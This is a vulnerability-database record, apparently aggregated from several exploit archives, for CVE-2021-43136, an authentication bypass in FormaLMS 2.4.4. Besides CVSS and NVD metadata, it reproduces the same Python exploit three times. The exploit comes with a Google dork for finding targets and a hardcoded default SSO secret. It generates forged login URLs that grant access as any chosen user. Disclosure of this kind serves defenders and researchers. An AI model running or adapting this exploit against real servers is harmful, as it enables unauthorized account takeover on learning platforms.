FormaLMS 2.4.4 Authentication Bypass
2021-11-11T00:00:00
Description
Related
cve
NVD
CVE-2021-43136
2021-11-10T12:15:00
zdt
exploit
FormaLMS 2.4.4 - Authentication Bypass Exploit
2021-11-11T00:00:00
exploitdb
exploit
FormaLMS 2.4.4 - Authentication Bypass
2021-11-11T00:00:00
{"id": "PACKETSTORM:164930", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "FormaLMS 2.4.4 Authentication Bypass", "description": "", "published": "2021-11-11T00:00:00", "modified": "2021-11-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164930/FormaLMS-2.4.4-Authentication-Bypass.html", "reporter": "Cristian Giustini", "references": [], "cvelist": ["CVE-2021-43136"], "immutableFields": [], "lastseen": "2021-11-11T17:15:32", "viewCount": 192, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-43136"]}, {"type": "exploitdb", "idList": ["EDB-ID:50513"]}, {"type": "zdt", "idList": ["1337DAY-ID-37031"]}], "rev": 4}, "score": {"value": 5.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-43136"]}, {"type": "exploitdb", "idList": ["EDB-ID:50513"]}, {"type": "zdt", "idList": ["1337DAY-ID-37031"]}]}, "exploitation": null, "vulnersScore": 5.6}, "sourceHref": "https://packetstormsecurity.com/files/download/164930/formalms244-bypass.txt", "sourceData": "`# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass \n# Google Dork: inurl:index.php?r=adm/ \n# Date: 2021-11-10 \n# Exploit Author: Cristian 'void' Giustini @ Hacktive Security \n# Vendor Homepage: https://formalms.org \n# Software Link: https://formalms.org \n# Version: <= 2.4.4 \n# Tested on: Linux \n# CVE : CVE-2021-43136 \n \n# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform. 
\n \n# Analysis: \nhttps://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/ \n \n# Nuclei template: \nhttps://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml \n \n#!/usr/bin/env python \n \n\"\"\" \n \nThe following exploit generates two URLs with empty and fixed value of the \"secret\". In order to achieve a successful exploitation the \"Enable SSO with a third party software through a token\" setting needs to be enabled \n \n\"\"\" \n \nimport sys \nimport time \nimport hashlib \n \nsecret = \"8ca0f69afeacc7022d1e589221072d6bcf87e39c\" \n \ndef help(): \n \nprint(f\"Usage: {sys.argv[0]} username target_url\") \n \nsys.exit() \n \n \nif len(sys.argv) < 3: \n \nhelp() \n \nuser, url = (sys.argv[1], sys.argv[2]) \nt = str(int(time.time()) + 5000) \ntoken = hashlib.md5(f\"{user},{t},{secret}\".encode()).hexdigest().upper() \nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\" \nprint(f\"URL with default secret: {final_url}\") \ntoken = hashlib.md5(f\"{user},{t},\".encode()).hexdigest().upper() \nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\" \nprint(f\"URL with empty secret: {final_url}\") \n \n \n`\n", "_state": {"dependencies": 1646419291}}
{"cve": [{"lastseen": "2022-03-23T19:38:27", "description": "An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T12:15:00", "type": "cve", "title": "CVE-2021-43136", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43136"], "modified": "2021-11-15T14:18:00", "cpe": ["cpe:/a:formalms:formalms:2.4.4"], "id": "CVE-2021-43136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:formalms:formalms:2.4.4:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2021-12-03T01:48:57", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdt", "title": "FormaLMS 2.4.4 - Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43136"], "modified": "2021-11-11T00:00:00", "id": "1337DAY-ID-37031", "href": "https://0day.today/exploit/description/37031", "sourceData": "# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass\n# Google Dork: inurl:index.php?r=adm/\n# Exploit Author: Cristian 'void' Giustini @ Hacktive Security\n# Vendor Homepage: https://formalms.org\n# Software Link: https://formalms.org\n# Version: <= 2.4.4\n# Tested on: Linux\n# CVE : CVE-2021-43136\n\n# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.\n\n# Analysis:\nhttps://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/\n\n# Nuclei template:\nhttps://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml\n\n#!/usr/bin/env python\n\n\"\"\"\n\nThe following exploit generates two URLs with empty and fixed value of the \"secret\". 
In order to achieve a successful exploitation the \"Enable SSO with a third party software through a token\" setting needs to be enabled\n\n\"\"\"\n\nimport sys\nimport time\nimport hashlib\n\nsecret = \"8ca0f69afeacc7022d1e589221072d6bcf87e39c\" \n\n def help():\n\n print(f\"Usage: {sys.argv[0]} username target_url\")\n\n sys.exit()\n\n \nif len(sys.argv) < 3:\n\n help()\n\nuser, url = (sys.argv[1], sys.argv[2])\nt = str(int(time.time()) + 5000)\ntoken = hashlib.md5(f\"{user},{t},{secret}\".encode()).hexdigest().upper()\nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\"\nprint(f\"URL with default secret: {final_url}\")\ntoken = hashlib.md5(f\"{user},{t},\".encode()).hexdigest().upper()\nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\"\nprint(f\"URL with empty secret: {final_url}\")\n", "sourceHref": "https://0day.today/exploit/37031", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:34:30", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "exploitdb", "title": "FormaLMS 2.4.4 - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-43136", "CVE-2021-43136"], "modified": "2021-11-11T00:00:00", "id": "EDB-ID:50513", "href": "https://www.exploit-db.com/exploits/50513", "sourceData": "# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass\r\n# Google Dork: inurl:index.php?r=adm/\r\n# Date: 2021-11-10\r\n# Exploit Author: Cristian 'void' Giustini @ Hacktive Security\r\n# Vendor Homepage: https://formalms.org\r\n# Software Link: https://formalms.org\r\n# Version: <= 2.4.4\r\n# Tested on: Linux\r\n# CVE : CVE-2021-43136\r\n\r\n# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.\r\n\r\n# Analysis:\r\nhttps://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/\r\n\r\n# Nuclei template:\r\nhttps://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml\r\n\r\n#!/usr/bin/env python\r\n\r\n\"\"\"\r\n\r\nThe following exploit generates two URLs with empty and fixed value of the \"secret\". 
In order to achieve a successful exploitation the \"Enable SSO with a third party software through a token\" setting needs to be enabled\r\n\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\nimport hashlib\r\n\r\nsecret = \"8ca0f69afeacc7022d1e589221072d6bcf87e39c\" \r\n\r\n def help():\r\n\r\n print(f\"Usage: {sys.argv[0]} username target_url\")\r\n\r\n sys.exit()\r\n\r\n \r\nif len(sys.argv) < 3:\r\n\r\n help()\r\n\r\nuser, url = (sys.argv[1], sys.argv[2])\r\nt = str(int(time.time()) + 5000)\r\ntoken = hashlib.md5(f\"{user},{t},{secret}\".encode()).hexdigest().upper()\r\nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\"\r\nprint(f\"URL with default secret: {final_url}\")\r\ntoken = hashlib.md5(f\"{user},{t},\".encode()).hexdigest().upper()\r\nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\"\r\nprint(f\"URL with empty secret: {final_url}\")", "sourceHref": "https://www.exploit-db.com/download/50513", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}